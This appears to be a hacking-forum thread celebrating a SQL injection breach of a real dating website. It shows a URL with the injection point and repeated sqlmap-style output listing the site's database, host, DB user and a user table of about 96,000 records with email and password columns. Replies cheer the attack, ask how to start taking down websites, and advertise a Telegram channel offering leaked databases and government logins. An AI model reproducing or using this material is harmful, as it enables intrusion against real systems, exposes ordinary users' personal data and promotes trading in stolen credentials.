SECOND HACK
by - Thursday, January 1, 1970 at 12:00 AM
https://www.meetup4fun.com/search_results.php?display=profile&uid=87230'>
Reply
Next level shit right there. Unbelievable!
Thank you @meli0das :pomlove:
Reply
If someone would like to learn how to do that, how would he start?


TO rephase it, How can I start taking down websites too?
Reply
Keep up the good work and maybe one day you'll be just as skilled as @Sleep
Reply
Wow what a great H4ck0r you are :kappa:

Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: https://www.meetup4fun.com:443/******

web application technology: Apache, Nginx
back-end DBMS: active fingerprint: MySQL >= 5.7
              comment injection fingerprint: MySQL 5.7.32
              html error message fingerprint: MySQL

current database: 'db5mdetearbdmq'

hostname: 'c91995.sgvps.net'

current user is DBA: False

database management system users [1]:
[*]'ucgjm2ujpnbrh'@'localhost'

database management system users privileges:
[*]'ucgjm2ujpnbrh'@'localhost' [1]:
    privilege: USAGE

database management system users roles:
[*]'ucgjm2ujpnbrh'@'localhost' [1]:
    role: USAGE

available databases [2]:
[*]db5mdetearbdmq
[*]information_schema

Database: db5mdetearbdmq
+----------+---------+
| Table    | Entries |
+----------+---------+
| `user`  | 96227  |
+----------+---------+

Database: db5mdetearbdmq
[192 tables]

User Sample:
active mail password name role type gender city state zip country birth
Hidden Content
You must register or login to view this content.
My kung fu is stronger than yours...


Reply
(July 16, 2022, 08:49 PM)34585 Wrote: Wow what a great H4ck0r you are :kappa:

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://www.meetup4fun.com:443/******


web application technology: Apache, Nginx
back-end DBMS: active fingerprint: MySQL >= 5.7
              comment injection fingerprint: MySQL 5.7.32
              html error message fingerprint: MySQL

current database: 'db5mdetearbdmq'

hostname: 'c91995.sgvps.net'

current user is DBA: False

database management system users [1]:
[*]'ucgjm2ujpnbrh'@'localhost'

database management system users privileges:
[*]'ucgjm2ujpnbrh'@'localhost' [1]:
    privilege: USAGE

database management system users roles:
[*]'ucgjm2ujpnbrh'@'localhost' [1]:
    role: USAGE

available databases [2]:
[*]db5mdetearbdmq
[*]information_schema

Database: db5mdetearbdmq
+----------+---------+
| Table    | Entries |
+----------+---------+
| `user`  | 96227  |
+----------+---------+

Database: db5mdetearbdmq
[192 tables]


User Sample:


active mail password name role type gender city state zip country birth

[*]
You didnt even deface it 1ee7 virgin nerd
Reply
(July 16, 2022, 08:52 PM)spice Wrote: [*]
You didnt even deface it 1ee7 virgin nerd


Yes Defacing is for pussys
My kung fu is stronger than yours...


Reply
awesome job bro thanks for submitting
Reply
(July 16, 2022, 08:49 PM)34585 Wrote: Wow what a great H4ck0r you are


Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: https://www.meetup4fun.com:443/******


web application technology: Apache, Nginx
back-end DBMS: active fingerprint: MySQL >= 5.7
              comment injection fingerprint: MySQL 5.7.32
              html error message fingerprint: MySQL

current database: 'db5mdetearbdmq'

hostname: 'c91995.sgvps.net'

current user is DBA: False

database management system users [1]:
  • 'ucgjm2ujpnbrh'@'localhost'

    database management system users privileges:
  • 'ucgjm2ujpnbrh'@'localhost' [1]:
        privilege: USAGE

    database management system users roles:
  • 'ucgjm2ujpnbrh'@'localhost' [1]:
        role: USAGE

    available databases [2]:
  • db5mdetearbdmq
  • information_schema

    Database: db5mdetearbdmq
    +----------+---------+
    | Table    | Entries |
    +----------+---------+
    | `user`  | 96227  |
    +----------+---------+

    Database: db5mdetearbdmq
    [192 tables]


    User Sample:
    active mail password name role type gender city state zip country birth


less see
Visit https://t.me/shadowleakss, for HQ top Private Free dbs, government logins.
Reply
nice work
Reply


 Users viewing this thread: SECOND HACK: No users currently viewing.